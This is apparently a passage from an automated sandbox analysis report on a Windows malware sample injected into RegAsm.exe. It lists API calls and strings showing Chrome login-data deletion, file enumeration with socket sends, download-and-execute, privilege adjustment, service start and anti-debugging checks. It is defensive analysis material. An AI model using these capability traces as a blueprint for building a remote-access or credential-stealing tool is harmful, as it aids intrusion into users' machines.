                                                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                                                        • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                                                        • UserProfile, xrefs: 0040BA59
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                        • API String ID: 2018770650-1062637481
                                                                                                                                        • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                        • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                                                        • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                        • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                        • GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                        • API String ID: 3534403312-3733053543
                                                                                                                                        • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                        • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                                                        • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                        • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                        • Opcode ID: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                                                                                                        • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                                                                                                                        • Opcode Fuzzy Hash: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                                                                                                        • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00409293
                                                                                                                                          • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00364948,00000010), ref: 004048E0
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                                                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                          • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1824512719-0
                                                                                                                                        • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                                                                        • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                                                                        • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                                                                        • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 276877138-0
                                                                                                                                        • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                        • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                                                        • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                        • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                                                                        • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                        • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                        • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                                                        • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                        • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                                                        APIs
                                                                                                                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                                                                                                        • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                        • String ID: SETTINGS
                                                                                                                                        • API String ID: 3473537107-594951305
                                                                                                                                        • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                        • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                                                                        • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                        • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1157919129-0
                                                                                                                                        • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                        • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                                                                        • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                        • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1771804793-0
                                                                                                                                        • Opcode ID: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                                                                                                        • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                                                                        • Opcode Fuzzy Hash: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                                                                                                        • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                                                                        APIs
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DownloadExecuteFileShell
                                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                                                                        • API String ID: 2825088817-3056885514
                                                                                                                                        • Opcode ID: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                                                                                                        • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                                                                        • Opcode Fuzzy Hash: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                                                                                                        • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$FirstNextsend
                                                                                                                                        • String ID: XPG$XPG
                                                                                                                                        • API String ID: 4113138495-1962359302
                                                                                                                                        • Opcode ID: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                                                                                                                        • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                                                                        • Opcode Fuzzy Hash: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                                                                                                                        • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                                                                        APIs
                                                                                                                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                          • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                          • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                          • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                        • API String ID: 4127273184-3576401099
                                                                                                                                        • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                        • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                                                        • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                        • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                        • String ID: p'E$JD
                                                                                                                                        • API String ID: 1084509184-908320845
                                                                                                                                        • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                        • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                                                                        • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                        • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2829624132-0
                                                                                                                                        • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                                        • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                                                        • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                                        • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                        • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                        • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                                                                        • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                        • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                        • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                        • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                        • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                        • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                                                                        • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
